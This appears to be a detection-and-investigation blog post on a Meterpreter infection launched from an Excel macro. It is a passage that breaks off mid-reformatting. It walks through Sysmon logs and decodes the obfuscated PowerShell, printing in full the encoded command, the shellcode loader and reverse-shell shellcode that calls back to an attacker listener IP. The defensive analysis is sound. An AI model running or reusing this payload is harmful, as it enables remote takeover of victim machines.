Meterpreter's Migrate: Detection and Investigation with memtriage and memdumppe

If you're fortunate enough to be running a modern endpoint detection and response (EDR) product or even endpoint protection (EPP), you may be in good shape for detecting or blocking things like Metasploit's Meterpreter payload. Meterpreter's capabilities have been emulated by other frameworks and malware. While there are more sophisticated attack tools available, testing detections and investigating Meterpreter is still a valuable exercise.

In this post, we'll take a look at a typical scenario involving a malicious Excel macro created using TrustedSec's Unicorn that spawns a Meterpreter reverse shell that connects back to a listener on an endpoint running Metasploit. We'll review some of the data that Sysmon captures using a popular Sysmon configuration from Internet infosec celeb SwiftOnSecurity.

After seeing what Sysmon captures, we'll grab gleeda's memtriage to take a deeper look. If you're not familiar with memtriage, you really should check it out as it enables investigators to run more than two dozen Volatility plugins against an endpoint while it is up and running. Years ago I was working in an environment with hundreds of thousands of servers strewn across data centers worldwide often with 192GB of RAM. Imagine trying to take a memory dump from one of those systems to run an investigation to ground. Having something like memtriage would have made investigations easier.

Let's play: Sysmon Says

Our unsuspecting user has opened an Excel spreadsheet containing a malicious macro as outlined above. Unbeknownst to the user, this has caused a reverse shell to call back to a listener on a remote system where the attacker used Meterpreter's priv extension to call getsystem, elevating the attacker's privileges to SYSTEM on the victim machine, which then enable's the attacker to migrate their malicious agent into to a legitimate process on the machine -- spoolsv.exe -- using code that's been around for at least a decade. Following the migration to spoolsv.exe, the attacker ran hashdump.

Here's some of what Sysmon logged:

Log Name:      Microsoft-Windows-Sysmon/Operational

Source:        Microsoft-Windows-Sysmon

Date:          7/19/2020 8:03:07 PM

Event ID:      1

Task Category: Process Create (rule: ProcessCreate)

Level:         Information

Keywords:      

User:          SYSTEM

Computer:      wins2012r202.1011Labs.com

Description:

Process Create:

RuleName: -

UtcTime: 2020-07-19 20:03:07.410

ProcessGuid: {fc3f293c-a6fb-5f14-437f-430000000000}

ProcessId: 2476

Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

FileVersion: 16.0.11929.20838

Description: Microsoft Excel

Product: Microsoft Office

Company: Microsoft Corporation

OriginalFileName: Excel.exe

CommandLine: "C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE" 

CurrentDirectory: C:\Windows\system32\

User: 1011LABS\dave.hull

LogonGuid: {fc3f293c-4e60-5f14-ee7e-3b0000000000}

LogonId: 0x3B7EEE

TerminalSessionId: 1

IntegrityLevel: High

Hashes: MD5=B0560334F0AFC1EEB1C1F67FD27ED79E,SHA256=477D98352D14E8A65C79A4A68112EBB92E03358708E7B04E9411831A2F0EA5E8,IMPHASH=9AE6B99DE4CEC4B19FFAFF4B2AA4C4E4

ParentProcessGuid: {fc3f293c-4e61-5f14-3d9a-3b0000000000}

ParentProcessId: 2344

ParentImage: C:\Windows\explorer.exe

ParentCommandLine: C:\Windows\Explorer.EXE

Above Sysmon has logged an Event Id 1 or process creation event, for the Excel process. We get the creation time, hostname, user context, parent process Id and name and GUIDs for this process and its parent. These globally unique identifiers are created by Sysmon to make tracking parent and child process relationships easier as process Ids alone can make this difficult due to the reuse of process Ids. There's some other useful thing, hashes of the process and the imphash or the hash of the process' import table.

So far, nothing unusual to see here. Next up, things take a turn.

A PowerShell Excursion:

Log Name:      Microsoft-Windows-Sysmon/Operational

Source:        Microsoft-Windows-Sysmon

Date:          7/19/2020 8:03:34 PM

Event ID:      1

Task Category: Process Create (rule: ProcessCreate)

Level:         Information

Keywords:      

User:          SYSTEM

Computer:      wins2012r202.1011Labs.com

Description:

Process Create:

RuleName: -

UtcTime: 2020-07-19 20:03:34.614

ProcessGuid: {fc3f293c-a716-5f14-06ce-430000000000}

ProcessId: 1604

Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

FileVersion: 10.0.14409.1005 (rs1_srvoob.161208-1155)

Description: Windows PowerShell

Product: Microsoft® Windows® Operating System

Company: Microsoft Corporation

OriginalFileName: PowerShell.EXE

CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  /w 1 /C "sv BvI -;sv AT ec;sv Al ((gv BvI).value.toString()+(gv AT).value.toString());powershell (gv Al).value.toString() ('JABpAHMAPQAnACQASwB1AD0AJwAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyACIAKwAiAC4AIgArACIAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACsAIgAuACIAKwAiAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABUAGEAbwApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQAIgArACIALgAiACsAIgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAVABXAD0AIgB9AGUAOAAsAH0AOAAyACwAfQAwADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADAALAB9ADgAOQAsAH0AZQA1ACwAfQAzADEALAB9AGMAMAAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMAAsAH0AMwAwACwAfQA4AGIALAB9ADUAMgAsAH0AMABjACwAfQA4AGIALAB9ADUAMgAsAH0AMQA0ACwAfQA4AGIALAB9ADcAMgAsAH0AMgA4ACwAfQAwAGYALAB9AGIANwAsAH0ANABhACwAfQAyADYALAB9ADMAMQAsAH0AZgBmACwAfQBhAGMALAB9ADMAYwAsAH0ANgAxACwAfQA3AGMALAB9ADAAMgAsAH0AMgBjACwAfQAyADAALAB9AGMAMQAsAH0AYwBmACwAfQAwAGQALAB9ADAAMQAsAH0AYwA3ACwAfQBlADIALAB9AGYAMgAsAH0ANQAyACwAfQA1ADcALAB9ADgAYgAsAH0ANQAyACwAfQAxADAALAB9ADgAYgAsAH0ANABhACwAfQAzAGMALAB9ADgAYgAsAH0ANABjACwAfQAxADEALAB9ADcAOAAsAH0AZQAzACwAfQA0ADgALAB9ADAAMQAsAH0AZAAxACwAfQA1ADEALAB9ADgAYgAsAH0ANQA5ACwAfQAyADAALAB9ADAAMQAsAH0AZAAzACwAfQA4AGIALAB9ADQAOQAsAH0AMQA4ACwAfQBlADMALAB9ADMAYQAsAH0ANAA5ACwAfQA4AGIALAB9ADMANAAsAH0AOABiACwAfQAwADEALAB9AGQANgAsAH0AMwAxACwAfQBmAGYALAB9AGEAYwAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANgAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADQALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1AGYALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQBiACwAfQA4AGQALAB9ADUAZAAsAH0ANgA4ACwAfQA2AGUALAB9ADYANQAsAH0ANwA0ACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA2ADkALAB9ADYAZQAsAH0ANgA5ACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQBmAGYALAB9AGQANQAsAH0AMwAxACwAfQBkAGIALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA2ADgALAB9ADMAYQAsAH0ANQA2ACwAfQA3ADkALAB9AGEANwAsAH0AZgBmACwAfQBkADUALAB9ADUAMwAsAH0ANQAzACwAfQA2AGEALAB9ADAAMwAsAH0ANQAzACwAfQA1ADMALAB9ADYAYQAsAH0ANQAwACwAfQBlADgALAB9ADgANAAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0AMgBmACwAfQAzADgALAB9ADQAYgAsAH0ANgA4ACwAfQAzADgALAB9ADMAOQAsAH0AMAAwACwAfQA1ADAALAB9ADYAOAAsAH0ANQA3ACwAfQA4ADkALAB9ADkAZgAsAH0AYwA2ACwAfQBmAGYALAB9AGQANQAsAH0AOAA5ACwAfQBjADYALAB9ADUAMwAsAH0ANgA4ACwAfQAwADAALAB9ADAAMgAsAH0ANgAwACwAfQA4ADQALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUANwAsAH0ANQAzACwAfQA1ADYALAB9ADYAOAAsAH0AZQBiACwAfQA1ADUALAB9ADIAZQAsAH0AMwBiACwAfQBmAGYALAB9AGQANQAsAH0AOQA2ACwAfQA2AGEALAB9ADAAYQAsAH0ANQBmACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUANgAsAH0ANgA4ACwAfQAyAGQALAB9ADAANgAsAH0AMQA4ACwAfQA3AGIALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA1ACwAfQAxADYALAB9ADYA'+'OAAsAH0AOAA4ACwAfQAxADMALAB9ADAAMAAsAH0AMAAwACwAfQA2ADgALAB9ADQANAAsAH0AZgAwACwAfQAzADUALAB9AGUAMAAsAH0AZgBmACwAfQBkADUALAB9ADQAZgAsAH0ANwA1ACwAfQBlADEALAB9ADYAOAAsAH0AZgAwACwAfQBiADUALAB9AGEAMgAsAH0ANQA2ACwAfQBmAGYALAB9AGQANQAsAH0ANgBhACwAfQA0ADAALAB9ADYAOAAsAH0AMAAwACwAfQAxADAALAB9ADAAMAAsAH0AMAAwACwAfQA2ADgALAB9ADAAMAAsAH0AMAAwACwAfQA0ADAALAB9ADAAMAAsAH0ANQAzACwAfQA2ADgALAB9ADUAOAAsAH0AYQA0ACwAfQA1ADMALAB9AGUANQAsAH0AZgBmACwAfQBkADUALAB9ADkAMwAsAH0ANQAzACwAfQA1ADMALAB9ADgAOQAsAH0AZQA3ACwAfQA1ADcALAB9ADYAOAAsAH0AMAAwACwAfQAyADAALAB9ADAAMAAsAH0AMAAwACwAfQA1ADMALAB9ADUANgAsAH0ANgA4ACwAfQAxADIALAB9ADkANgAsAH0AOAA5ACwAfQBlADIALAB9AGYAZgAsAH0AZAA1ACwAfQA4ADUALAB9AGMAMAAsAH0ANwA0ACwAfQBjAGQALAB9ADgAYgAsAH0AMAA3ACwAfQAwADEALAB9AGMAMwAsAH0AOAA1ACwAfQBjADAALAB9ADcANQAsAH0AZQA1ACwAfQA1ADgALAB9AGMAMwAsAH0ANQBmACwAfQBlADgALAB9ADcAZAAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0AMwAxACwAfQAzADAALAB9ADIAZQAsAH0AMwA0ACwAfQAzADcALAB9ADIAZQAsAH0AMwA0ACwAfQAzADcALAB9ADIAZQAsAH0AMwAyACwAfQAzADYALAB9ADAAMAAiADsAJABaAHUAPQBBAGQAZAAtAFQAeQBwAGUAIAAtAHAAYQBzAHMAIAAtAG0AIAAkAEsAdQAgAC0ATgBhAG0AZQAgACIAVQBWACIAIAAtAG4AYQBtAGUAcwAgAHcAWAByADsAJABaAHUAPQAkAFoAdQAuAHIAZQBwAGwAYQBjAGUAKAAiAHcAWAByACIALAAgACIAVwBpACIAKwAiAG4AIgArACIAMwAyAEYAdQBuAGMAdABpAG8AbgBzACIAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAFQAVwAgAD0AIAAkAFQAVwAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACIAUQBoAEUAYQB4ACIAKQAuAHIAZQBwAGwAYQBjAGUAKAAiAFEAaABFAGEAIgAsACAAIgAwACIAKQAuAFMAcABsAGkAdAAoACIALAAiACkAOwAkAFIATgA9ADAAeAAxADAAMAA3ADsAaQBmACAAKAAkAFQAVwAuAEwAIAAtAGcAdAAgADAAeAAxADAAMAA3ACkAewAkAFIATgA9ACQAVABXAC4ATAB9ADsAJABkAFYAPQAkAFoAdQA6ADoAYwBhAGwAbABvAGMAKAAwAHgAMQAwADAANwAsACAAMQApADsAWwBVAEkAbgB0ADYANABdACQAVABhAG8AIAA9ACAAMAA7AGYAbwByACgAJAB2AFgAPQAwADsAJAB2AFgAIAAtAGwAZQAoACQAVABXAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAHYAWAArACsAKQB7ACQAWgB1ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAZABWAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAHYAWAApACwAIAAkAFQAVwBbACQAdgBYAF0ALAAgADEAKQB9ADsAJABaAHUAOgA6AFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQAZABWACwAIAAwAHgAMQAwADAANwAsACAAMAB4ADQAMAAsACAAWwBSAGUAZgBdACQAVABhAG8AKQA7ACQAWgB1ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwAHgAMAAwACwAJABkAFYALAAwACwAMAAsADAAKQA7ACcAOwAkAHEAegA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAaQBzACkAKQA7ACQAdQBtAD0AIgBwAG8AdwBlAHIAcwBoAGUAbABsACIAOwAkAFAATQA9ACIAVwBpAG4AZABvAHcAcwAiADsAJABrAFgAdAAgAD0AIAAiAEMAOgBcACQAUABNAFwAcwB5AHMAdwBvAHcANgA0AFwAJABQAE0AJAB1AG0AXAB2ADEALgAwAFwAJAB1AG0AIgA7ACQASQB0AFgAIAA9ACAAJwBUAHIAIgArACIAdQAiACsAIgBlACcAOwBpAGYAKABbAGUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBJAHMANgA0AEIAaQB0AE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACAALQBlAHEAIAAnACQASQB0AFgAJwApAHsAJAB1AG0APQAgACQAawBYAHQAfQA7ACQAdgBGAD0AIgAgACQAdQBtACAAUwB3AGYAWAAgACQAcQB6ACIAOwAkAHYARgA9ACQAdgBGAC4AcgBlAHAAbABhAGMAZQAoACIAUwB3AGYAWAAiACwAIAAiAC0AbgBvAGUAeABpAHQAIAAtAGUAIgApADsAaQBlAHgAIAAkAHYARgA=')"

CurrentDirectory: C:\Users\davehull\Documents\

User: 1011LABS\dave.hull

LogonGuid: {fc3f293c-4e60-5f14-ee7e-3b0000000000}

LogonId: 0x3B7EEE

TerminalSessionId: 1

IntegrityLevel: High

Hashes: MD5=38FD25D3D4AD1C28F741B1D4D50B2E6E,SHA256=2C2F1A21D85504374679D83D1BE9553D082AD9B28CBB847A90F04305A09882B9,IMPHASH=A4D32F1AEF525B8ADA6A26F28596AC2E

ParentProcessGuid: {fc3f293c-a6fb-5f14-437f-430000000000}

ParentProcessId: 2476

ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE"

Above we have Sysmon logging a process creation event for a PowerShell process. Note this process is a child of the previous Excel process. We can confirm this by looking at the parent process GUID and matching it against the process GUID from the previous process creation event. You could compare the parent process Ids, but again, this is not always foolproof given process Id reuse.

As an aside here, many may assume Excel parenting PowerShell is immediately suspect, but in some enterprises, there may be legitimate Excel macros that spawn PowerShell or cmd.exe processes to execute some additional supporting process. You may think it ridiculous, but there are examples of this to be found.

The tell that something is awry with this instance of PowerShell is found on the command-line. No, not the base64 blob, which is also commonly used benignly to protect binary data sent via protocols that can only handle ASCII or to protect formatting. Here's the part that gives it away, for me:

CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  /w 1 /C "sv BvI -;sv AT ec;sv Al ((gv BvI).value.toString()+(gv AT).value.toString());powershell (gv Al).value.toString()

What's going on here is clear obfuscation -- someone is trying to evade detection. Let's break this down a bit. 

/w 1 will set the window style to hidden, preventing the PowerShell window from popping up on the user's screen.

"sv BvI -;sv AT ec;sv Al ((gv BvI).value.toString()+(gv AT).value.toString());powershell (gv Al).value.toString()

Above is where things get really suspect. In the line above the alias for Set-Variable, sv, is used to create a variable called BvI and its value is set to the hyphen character. Next, another variable, AT is created with a value of ec, next a variable named Al is set to the concatenation of the two previous variables, so -ec, short for -EncodedCommand. Next that variable is passed as an argument to another PowerShell instance followed by the base64 encoded command.

What of the encoded command? If you run it through GCHQ's extremely useful Cyberchef, you'll get this:

$is='$Ku=''[DllImport(("msvcrt"+"."+"dll"))]public static extern IntPtr calloc(uint dwSize, uint amount);[DllImport("kernel32"+"."+"dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("kernel32"+"."+"dll")]public static extern IntPtr VirtualProtect(IntPtr lpStartAddress, uint dwSize, uint flNewProtect, out uint Tao);[DllImport("msvcrt"+"."+"dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);'';$TW="}e8,}82,}00,}00,}00,}60,}89,}e5,}31,}c0,}64,}8b,}50,}30,}8b,}52,}0c,}8b,}52,}14,}8b,}72,}28,}0f,}b7,}4a,}26,}31,}ff,}ac,}3c,}61,}7c,}02,}2c,}20,}c1,}cf,}0d,}01,}c7,}e2,}f2,}52,}57,}8b,}52,}10,}8b,}4a,}3c,}8b,}4c,}11,}78,}e3,}48,}01,}d1,}51,}8b,}59,}20,}01,}d3,}8b,}49,}18,}e3,}3a,}49,}8b,}34,}8b,}01,}d6,}31,}ff,}ac,}c1,}cf,}0d,}01,}c7,}38,}e0,}75,}f6,}03,}7d,}f8,}3b,}7d,}24,}75,}e4,}58,}8b,}58,}24,}01,}d3,}66,}8b,}0c,}4b,}8b,}58,}1c,}01,}d3,}8b,}04,}8b,}01,}d0,}89,}44,}24,}24,}5b,}5b,}61,}59,}5a,}51,}ff,}e0,}5f,}5f,}5a,}8b,}12,}eb,}8d,}5d,}68,}6e,}65,}74,}00,}68,}77,}69,}6e,}69,}54,}68,}4c,}77,}26,}07,}ff,}d5,}31,}db,}53,}53,}53,}53,}53,}68,}3a,}56,}79,}a7,}ff,}d5,}53,}53,}6a,}03,}53,}53,}6a,}50,}e8,}84,}00,}00,}00,}2f,}38,}4b,}68,}38,}39,}00,}50,}68,}57,}89,}9f,}c6,}ff,}d5,}89,}c6,}53,}68,}00,}02,}60,}84,}53,}53,}53,}57,}53,}56,}68,}eb,}55,}2e,}3b,}ff,}d5,}96,}6a,}0a,}5f,}53,}53,}53,}53,}56,}68,}2d,}06,}18,}7b,}ff,}d5,}85,}c0,}75,}16,}68,}88,}13,}00,}00,}68,}44,}f0,}35,}e0,}ff,}d5,}4f,}75,}e1,}68,}f0,}b5,}a2,}56,}ff,}d5,}6a,}40,}68,}00,}10,}00,}00,}68,}00,}00,}40,}00,}53,}68,}58,}a4,}53,}e5,}ff,}d5,}93,}53,}53,}89,}e7,}57,}68,}00,}20,}00,}00,}53,}56,}68,}12,}96,}89,}e2,}ff,}d5,}85,}c0,}74,}cd,}8b,}07,}01,}c3,}85,}c0,}75,}e5,}58,}c3,}5f,}e8,}7d,}ff,}ff,}ff,}31,}30,}2e,}34,}37,}2e,}34,}37,}2e,}32,}36,}00";$Zu=Add-Type -pass -m $Ku -Name "UV" -names wXr;$Zu=$Zu.replace("wXr", "Wi"+"n"+"32Functions");[byte[]]$TW = $TW.replace("}","QhEax").replace("QhEa", "0").Split(",");$RN=0x1007;if ($TW.L -gt 0x1007){$RN=$TW.L};$dV=$Zu::calloc(0x1007, 1);[UInt64]$Tao = 0;for($vX=0;$vX -le($TW.Length-1);$vX++){$Zu::memset([IntPtr]($dV.ToInt32()+$vX), $TW[$vX], 1)};$Zu::VirtualProtect($dV, 0x1007, 0x40, [Ref]$Tao);$Zu::CreateThread(0,0x00,$dV,0,0,0);';$qz=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($is));$um="powershell";$PM="Windows";$kXt = "C:\$PM\syswow64\$PM$um\v1.0\$um";$ItX = 'Tr"+"u"+"e';if([environment]::Is64BitOperatingSystem -eq '$ItX'){$um= $kXt};$vF=" $um SwfX $qz";$vF=$vF.replace("SwfX", "-noexit -e");iex $vF

We could spend an entire post picking this apart. For our purposes and for expediency, let's call out a few things about it and move on. According to the esteemable polymath Lee Holmes, the proper way to attempt deobfuscation of obfuscated PowerShell is to run it in a VM with the latest PowerShell installed and all PS logging enabled, then review the logs post execution. The reason for this is that PowerShell has side effects, which is to say executing PS, even if you were to replace the iex $vF called near the end of the output above with something like Write-Host $vF, could cause changes outside the scope.

The above has already executed on our victim system and was logged in PowerShell's Operational log as a 4104 event:

$Ku='[DllImport(("msvcrt"+"."+"dll"))]public static extern IntPtr calloc(uint dwSize, uint amount);[DllImport("kernel32"+"."+"dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("kernel32"+"."+"dll")]public static extern IntPtr VirtualProtect(IntPtr lpStartAddress, uint dwSize, uint flNewProtect, out uint Tao);[DllImport("msvcrt"+"."+"dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$TW="}e8,}82,}00,}00,}00,}60,}89,}e5,}31,}c0,}64,}8b,}50,}30,}8b,}52,}0c,}8b,}52,}14,}8b,}72,}28,}0f,}b7,}4a,}26,}31,}ff,}ac,}3c,}61,}7c,}02,}2c,}20,}c1,}cf,}0d,}01,}c7,}e2,}f2,}52,}57,}8b,}52,}10,}8b,}4a,}3c,}8b,}4c,}11,}78,}e3,}48,}01,}d1,}51,}8b,}59,}20,}01,}d3,}8b,}49,}18,}e3,}3a,}49,}8b,}34,}8b,}01,}d6,}31,}ff,}ac,}c1,}cf,}0d,}01,}c7,}38,}e0,}75,}f6,}03,}7d,}f8,}3b,}7d,}24,}75,}e4,}58,}8b,}58,}24,}01,}d3,}66,}8b,}0c,}4b,}8b,}58,}1c,}01,}d3,}8b,}04,}8b,}01,}d0,}89,}44,}24,}24,}5b,}5b,}61,}59,}5a,}51,}ff,}e0,}5f,}5f,}5a,}8b,}12,}eb,}8d,}5d,}68,}6e,}65,}74,}00,}68,}77,}69,}6e,}69,}54,}68,}4c,}77,}26,}07,}ff,}d5,}31,}db,}53,}53,}53,}53,}53,}68,}3a,}56,}79,}a7,}ff,}d5,}53,}53,}6a,}03,}53,}53,}6a,}50,}e8,}84,}00,}00,}00,}2f,}38,}4b,}68,}38,}39,}00,}50,}68,}57,}89,}9f,}c6,}ff,}d5,}89,}c6,}53,}68,}00,}02,}60,}84,}53,}53,}53,}57,}53,}56,}68,}eb,}55,}2e,}3b,}ff,}d5,}96,}6a,}0a,}5f,}53,}53,}53,}53,}56,}68,}2d,}06,}18,}7b,}ff,}d5,}85,}c0,}75,}16,}68,}88,}13,}00,}00,}68,}44,}f0,}35,}e0,}ff,}d5,}4f,}75,}e1,}68,}f0,}b5,}a2,}56,}ff,}d5,}6a,}40,}68,}00,}10,}00,}00,}68,}00,}00,}40,}00,}53,}68,}58,}a4,}53,}e5,}ff,}d5,}93,}53,}53,}89,}e7,}57,}68,}00,}20,}00,}00,}53,}56,}68,}12,}96,}89,}e2,}ff,}d5,}85,}c0,}74,}cd,}8b,}07,}01,}c3,}85,}c0,}75,}e5,}58,}c3,}5f,}e8,}7d,}ff,}ff,}ff,}31,}30,}2e,}34,}37,}2e,}34,}37,}2e,}32,}36,}00";$Zu=Add-Type -pass -m $Ku -Name "UV" -names wXr;$Zu=$Zu.replace("wXr", "Wi"+"n"+"32Functions");[byte[]]$TW = $TW.replace("}","QhEax").replace("QhEa", "0").Split(",");$RN=0x1007;if ($TW.L -gt 0x1007){$RN=$TW.L};$dV=$Zu::calloc(0x1007, 1);[UInt64]$Tao = 0;for($vX=0;$vX -le($TW.Length-1);$vX++){$Zu::memset([IntPtr]($dV.ToInt32()+$vX), $TW[$vX], 1)};$Zu::VirtualProtect($dV, 0x1007, 0x40, [Ref]$Tao);$Zu::CreateThread(0,0x00,$dV,0,0,0);

This is not so different from what we saw above. This is passed as an argument to yet another PowerShell process. To recap we had Excel spawn a PowerShell building an obfuscated command line that was passed to another PowerShell, shown above once removed (white text), which spawns another PowerShell that runs the code above in black. If you're keeping track, it's a noisy attack.

Again a full accounting requires more work than we'll go into now, but let's spend a little time analyzing this. First, I find it helpful to put this into an IDE that can make sense of PowerShell and clean things up a bit.

$Ku='[DllImport(("msvcrt"+"."+"dll"))]public static extern IntPtr calloc(uint dwSize, uint `

amount)`

[DllImport("kernel32"+"."+"dll")]public static extern IntPtr CreateThread(IntPtr `

lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, `

uint dwCreationFlags, IntPtr lpThreadId)`

[DllImport("kernel32"+"."+"dll")]public static extern IntPtr VirtualProtect(IntPtr `

lpStartAddress, uint dwSize, uint flNewProtect, out uint Tao)`

[DllImport("msvcrt"+"."+"dll")]public static extern IntPtr memset(IntPtr dest, uint src, `

uint count);'

$TW="}e8,}82,}00,}00,}00,}60,}89,}e5,}31,}c0,}64,}8b,}50,}30,}8b,}52,}0c,}8b,}52,}14,}8b,`

}72,}28,}0f,}b7,}4a,}26,}31,}ff,}ac,}3c,}61,}7c,}02,}2c,}20,}c1,}cf,}0d,}01,}c7,}e2,}f2,`

}52,}57,}8b,}52,}10,}8b,}4a,}3c,}8b,}4c,}11,}78,}e3,}48,}01,}d1,}51,}8b,}59,}20,}01,}d3,`

}8b,}49,}18,}e3,}3a,}49,}8b,}34,}8b,}01,}d6,}31,}ff,}ac,}c1,}cf,}0d,}01,}c7,}38,}e0,}75,`

}f6,}03,}7d,}f8,}3b,}7d,}24,}75,}e4,}58,}8b,}58,}24,}01,}d3,}66,}8b,}0c,}4b,}8b,}58,}1c,`

}01,}d3,}8b,}04,}8b,}01,}d0,}89,}44,}24,}24,}5b,}5b,}61,}59,}5a,}51,}ff,}e0,}5f,}5f,}5a,`

}8b,}12,}eb,}8d,}5d,}68,}6e,}65,}74,}00,}68,}77,}69,}6e,}69,}54,}68,}4c,}77,}26,}07,}ff,`

}d5,}31,}db,}53,}53,}53,}53,}53,}68,}3a,}56,}79,}a7,}ff,}d5,}53,}53,}6a,}03,}53,}53,}6a,`

}50,}e8,}84,}00,}00,}00,}2f,}38,}4b,}68,}38,}39,}00,}50,}68,}57,}89,}9f,}c6,}ff,}d5,}89,`

}c6,}53,}68,}00,}02,}60,}84,}53,}53,}53,}57,}53,}56,}68,}eb,}55,}2e,}3b,}ff,}d5,}96,}6a,`

}0a,}5f,}53,}53,}53,}53,}56,}68,}2d,}06,}18,}7b,}ff,}d5,}85,}c0,}75,}16,}68,}88,}13,}00,`

}00,}68,}44,}f0,}35,}e0,}ff,}d5,}4f,}75,}e1,}68,}f0,}b5,}a2,}56,}ff,}d5,}6a,}40,}68,}00,`

